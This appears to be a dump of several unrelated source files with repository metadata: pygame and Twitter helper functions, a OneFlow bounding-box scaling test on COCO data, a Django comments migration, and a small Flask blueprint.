lines = text.split('\n')
for line in lines:
labels.append(myfont.render(line,1,foreground))
screen.fill(background)
y = 0
for label in labels:
screen.blit(label, (0,y))
y += 15
pygame.display.update()
def InputLoop(eventmap):
"""Begins a pygame loop, mapping key inputs to functions
eventmap <dict>, {pygame.K_t:myfunction}
"""
index = 0
while True:
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
#print("{0}: You pressed {1:c}".format ( index , event.key ))
if event.key in eventmap:
eventmap[event.key]()
elif event.type == pygame.QUIT:
pygame.quit()
sys.exit()
def InputLoopDemo():
def dog():
print('woof')
def cat():
print('meow')
def fish():
print('blub')
WindowSetup(caption='pet simulator',text='d for dog\nc for cat\nf for fish')
InputLoop({pygame.K_d:dog, pygame.K_c:cat, pygame.K_f:fish})
### TWITTER ###
def Tweet(twit,statustext):
"""Tweets a message
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
statustext <str>, must be <= 140 characters
"""
if len(statustext) > 140:
print('ERROR: Character limit 140 exceeded:',len(statustext))
else:
twit.update_status(status=statustext)
def TweetPicture(twit,file,statustext):
"""Tweets a message with a picture
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to picture
statustext <str>, must be <= 140 characters
"""
photo = open(file, 'rb')
response = twitter.upload_media(media=photo)
twit.update_status(status=statustext, media_ids=[response['media_id']])
def TweetVideo(twit,file,statustext):
"""Tweets a message with a video
twit <Twython>, create with Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
file <str>, path and filename to video
statustext <str>, must be <= 140 characters
"""
video = open(file, 'rb')
response = twitter.upload_video(media=video, media_type='video/mp4')
twit.update_status(status=statustext, media_ids=[response['media_id']])
| 30.883562 | 94 | 0.635174 |
71ad91d94d2021895fed2197ad1e1027179c068d | 5,844 | py | Python | oneflow/python/test/ops/test_object_bbox_scale.py | caishenghang/oneflow | db239cc9f98e551823bf6ce2d4395bd5c339b1c5 | [
"Apache-2.0"
] | 2 | 2021-09-10T00:19:49.000Z | 2021-11-16T11:27:20.000Z | oneflow/python/test/ops/test_object_bbox_scale.py | duijiudanggecl/oneflow | d2096ae14cf847509394a3b717021e2bd1d72f62 | [
"Apache-2.0"
] | null | null | null | oneflow/python/test/ops/test_object_bbox_scale.py | duijiudanggecl/oneflow | d2096ae14cf847509394a3b717021e2bd1d72f62 | [
"Apache-2.0"
] | 1 | 2021-11-10T07:57:01.000Z | 2021-11-10T07:57:01.000Z | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import os
import random
import cv2
import numpy as np
import oneflow as flow
import oneflow.typing as oft
def _random_sample_images(anno_file, image_dir, batch_size):
from pycocotools.coco import COCO
image_files = []
image_ids = []
batch_group_id = -1
coco = COCO(anno_file)
img_ids = coco.getImgIds()
while len(image_files) < batch_size:
rand_img_id = random.choice(img_ids)
img_h = coco.imgs[rand_img_id]["height"]
img_w = coco.imgs[rand_img_id]["width"]
group_id = int(img_h / img_w)
if batch_group_id == -1:
batch_group_id = group_id
if group_id != batch_group_id:
continue
anno_ids = coco.getAnnIds(imgIds=[rand_img_id])
if len(anno_ids) == 0:
continue
image_files.append(os.path.join(image_dir, coco.imgs[rand_img_id]["file_name"]))
image_ids.append(rand_img_id)
assert len(image_files) == len(image_ids)
images = [cv2.imread(image_file).astype(np.single) for image_file in image_files]
bbox_list = _get_images_bbox_list(coco, image_ids)
return images, bbox_list
def _get_images_bbox_list(coco, image_ids):
bbox_list = []
for img_id in image_ids:
anno_ids = coco.getAnnIds(imgIds=[img_id])
anno_ids = list(
filter(lambda anno_id: coco.anns[anno_id]["iscrowd"] == 0, anno_ids)
)
bbox_array = np.array(
[coco.anns[anno_id]["bbox"] for anno_id in anno_ids], dtype=np.single
)
bbox_list.append(bbox_array)
return bbox_list
def _get_images_static_shape(images):
image_shapes = [image.shape for image in images]
image_static_shape = np.amax(image_shapes, axis=0)
assert isinstance(
image_static_shape, np.ndarray
), "image_shapes: {}, image_static_shape: {}".format(
str(image_shapes), str(image_static_shape)
)
image_static_shape = image_static_shape.tolist()
image_static_shape.insert(0, len(image_shapes))
return image_static_shape
def _get_bbox_static_shape(bbox_list):
bbox_shapes = [bbox.shape for bbox in bbox_list]
bbox_static_shape = np.amax(bbox_shapes, axis=0)
assert isinstance(
bbox_static_shape, np.ndarray
), "bbox_shapes: {}, bbox_static_shape: {}".format(
str(bbox_shapes), str(bbox_static_shape)
)
bbox_static_shape = bbox_static_shape.tolist()
bbox_static_shape.insert(0, len(bbox_list))
return bbox_static_shape
def _of_target_resize_bbox_scale(images, bbox_list, target_size, max_size):
image_shape = _get_images_static_shape(images)
bbox_shape = _get_bbox_static_shape(bbox_list)
flow.clear_default_session()
func_config = flow.FunctionConfig()
func_config.default_data_type(flow.float)
func_config.default_logical_view(flow.scope.mirrored_view())
@flow.global_function(function_config=func_config)
def target_resize_bbox_scale_job(
image_def: oft.ListListNumpy.Placeholder(
shape=tuple(image_shape), dtype=flow.float
),
bbox_def: oft.ListListNumpy.Placeholder(
shape=tuple(bbox_shape), dtype=flow.float
),
):
images_buffer = flow.tensor_list_to_tensor_buffer(image_def)
resized_images_buffer, new_size, scale = flow.image_target_resize(
images_buffer, target_size=target_size, max_size=max_size
)
bbox_buffer = flow.tensor_list_to_tensor_buffer(bbox_def)
scaled_bbox = flow.object_bbox_scale(bbox_buffer, scale)
scaled_bbox_list = flow.tensor_buffer_to_tensor_list(
scaled_bbox, shape=bbox_shape[1:], dtype=flow.float
)
return scaled_bbox_list, new_size
input_image_list = [np.expand_dims(image, axis=0) for image in images]
input_bbox_list = [np.expand_dims(bbox, axis=0) for bbox in bbox_list]
output_bbox_list, output_image_size = target_resize_bbox_scale_job(
[input_image_list], [input_bbox_list]
).get()
return output_bbox_list.numpy_lists()[0], output_image_size.numpy_list()[0]
def _compare_bbox_scale(
test_case,
anno_file,
image_dir,
batch_size,
target_size,
max_size,
print_debug_info=False,
):
images, bbox_list = _random_sample_images(anno_file, image_dir, batch_size)
of_bbox_list, image_size_list = _of_target_resize_bbox_scale(
images, bbox_list, target_size, max_size
)
for image, bbox, of_bbox, image_size in zip(
images, bbox_list, of_bbox_list, image_size_list
):
w, h = image_size
oh, ow = image.shape[0:2]
scale_h = h / oh
scale_w = w / ow
bbox[:, 0] *= scale_w
bbox[:, 1] *= scale_h
bbox[:, 2] *= scale_w
bbox[:, 3] *= scale_h
test_case.assertTrue(np.allclose(bbox, of_bbox))
@flow.unittest.skip_unless_1n1d()
class TestObjectBboxScale(flow.unittest.TestCase):
def test_object_bbox_scale(test_case):
_compare_bbox_scale(
test_case,
"/dataset/mscoco_2017/annotations/instances_val2017.json",
"/dataset/mscoco_2017/val2017",
4,
800,
1333,
)
if __name__ == "__main__":
unittest.main()
| 32.287293 | 88 | 0.688912 |
1ce550dcd34ad1e54a6bb3af57029219d257f4d1 | 742 | py | Python | source/blog/migrations/0004_postcomments.py | JakubGutowski/PersonalBlog | 96122b36486f7e874c013e50d939732a43db309f | [
"BSD-3-Clause"
] | null | null | null | source/blog/migrations/0004_postcomments.py | JakubGutowski/PersonalBlog | 96122b36486f7e874c013e50d939732a43db309f | [
"BSD-3-Clause"
] | null | null | null | source/blog/migrations/0004_postcomments.py | JakubGutowski/PersonalBlog | 96122b36486f7e874c013e50d939732a43db309f | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.0.5 on 2018-07-02 19:46
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0003_blogpost_author'),
]
operations = [
migrations.CreateModel(
name='PostComments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nick', models.CharField(max_length=20)),
('comment', models.CharField(max_length=140)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.BlogPost')),
],
),
]
| 30.916667 | 115 | 0.58221 |
1cecb4c2f3b6f24c919644faa0e058b12f679c06 | 273 | py | Python | src/flocker/blueprints/red/__init__.py | Muxelmann/home-projects | 85bd06873174b9c5c6276160988c19b460370db8 | [
"MIT"
] | null | null | null | src/flocker/blueprints/red/__init__.py | Muxelmann/home-projects | 85bd06873174b9c5c6276160988c19b460370db8 | [
"MIT"
] | null | null | null | src/flocker/blueprints/red/__init__.py | Muxelmann/home-projects | 85bd06873174b9c5c6276160988c19b460370db8 | [
"MIT"
] | null | null | null | import os
from flask import Blueprint, render_template
def create_bp():
bp_red = Blueprint('red', __name__, url_prefix='/red')
@bp_red.route('/index/')
@bp_red.route('/')
def index():
return render_template('red/index.html')
return bp_red | 22.75 | 58 | 0.652015 |
1c073d575249e6f524c3e4fa1ac84edb0ff05cc7 | 984 | py | Python | UAS/UAS 11 & 12/main.py | Archedar/UAS | 3237d9304026340acc93c8f36b358578dc0ae66f | [
"BSD-Source-Code"
] | null | null | null | UAS/UAS 11 & 12/main.py | Archedar/UAS | 3237d9304026340acc93c8f36b358578dc0ae66f | [
"BSD-Source-Code"
] | null | null | null | UAS/UAS 11 & 12/main.py | Archedar/UAS | 3237d9304026340acc93c8f36b358578dc0ae66f | [
"BSD-Source-Code"
] | null | null | null | #Main Program
from Class import Barang
import Menu
histori = list()
listBarang = [
Barang('Rinso', 5000, 20),
Barang('Sabun', 3000, 20),
Barang('Pulpen', 2500, 20),
Barang('Tisu', 10000, 20),
Barang('Penggaris', 1000, 20)
]
while True:
print('''
Menu
1. Tampilkan Barang
2. Tambahkan Barang
3. Tambah Stock Barang
4. Hapus Barang
5. Cari Barang Berdasarkan Keyword
6. Hitung Barang Belanjaan
7. Histori Keluar Masuk Barang
0. Keluar Program
''')
choice = input('Masukan No Menu: ')
if choice == '1':
Menu.menu1(listBarang)
elif choice == '2':
Menu.menu2(listBarang, histori)
elif choice == '3':
Menu.menu3(listBarang, histori)
elif choice == '4':
Menu.menu4(listBarang, histori)
elif choice == '5':
Menu.menu5(listBarang)
elif choice == '6':
Menu.menu6(listBarang, histori)
elif choice == '7':
Menu.menu7(histori)
elif choice == '0':
print('Keluar Program')
break
else:
print('Invalid Input!') | 20.93617 | 37 | 0.645325 |
98d7520f9994f6836e73faaf42f63009eee0dc64 | 697 | py | Python | project/cli/event.py | DanielGrams/gsevp | e94034f7b64de76f38754b56455e83092378261f | [
"MIT"
] | 1 | 2021-06-01T14:49:18.000Z | 2021-06-01T14:49:18.000Z | project/cli/event.py | DanielGrams/gsevp | e94034f7b64de76f38754b56455e83092378261f | [
"MIT"
] | 286 | 2020-12-04T14:13:00.000Z | 2022-03-09T19:05:16.000Z | project/cli/event.py | DanielGrams/gsevpt | a92f71694388e227e65ed1b24446246ee688d00e | [
"MIT"
] | null | null | null | import click
from flask.cli import AppGroup
from project import app, db
from project.dateutils import berlin_tz
from project.services.event import (
get_recurring_events,
update_event_dates_with_recurrence_rule,
)
event_cli = AppGroup("event")
@event_cli.command("update-recurring-dates")
def update_recurring_dates():
# Setting the timezone is neccessary for cli command
db.session.execute("SET timezone TO :val;", {"val": berlin_tz.zone})
events = get_recurring_events()
for event in events:
update_event_dates_with_recurrence_rule(event)
db.session.commit()
click.echo(f"{len(events)} event(s) were updated.")
app.cli.add_command(event_cli)
| 24.034483 | 72 | 0.746055 |
End of preview. Expand
in Data Studio
- Downloads last month
- 9